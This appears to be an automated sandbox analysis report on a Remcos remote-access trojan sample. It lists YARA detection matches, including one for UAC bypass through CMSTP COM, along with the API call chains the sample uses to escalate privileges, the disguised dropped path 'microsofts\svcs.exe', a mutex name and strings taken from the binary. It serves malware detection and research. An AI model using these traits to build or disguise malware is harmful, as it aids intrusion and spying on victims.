                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@6/3@2/1
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00417952
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,3_2_00417952
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040F474
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041B4A8
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AA4A
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeFile created: C:\Users\user\AppData\Roaming\microsoftsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-3XK1S0
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Software\0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Rmc-3XK1S00_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Exe0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Exe0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Rmc-3XK1S00_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Inj0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Inj0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Mw0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Mw0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Mw0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: 8SG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Mw0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: exepath0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: 8SG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: exepath0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Mw0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: licence0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: dMG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: (x0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: PSG0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: Administrator0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: User0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: del0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: del0_2_0040E9C5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCommand line argument: del0_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: Software\3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: Exe3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: Inj3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: Inj3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: 8SG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: exepath3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: 8SG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: exepath3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: licence3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: dMG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCommand line argument: PG3_2_0040E9C5
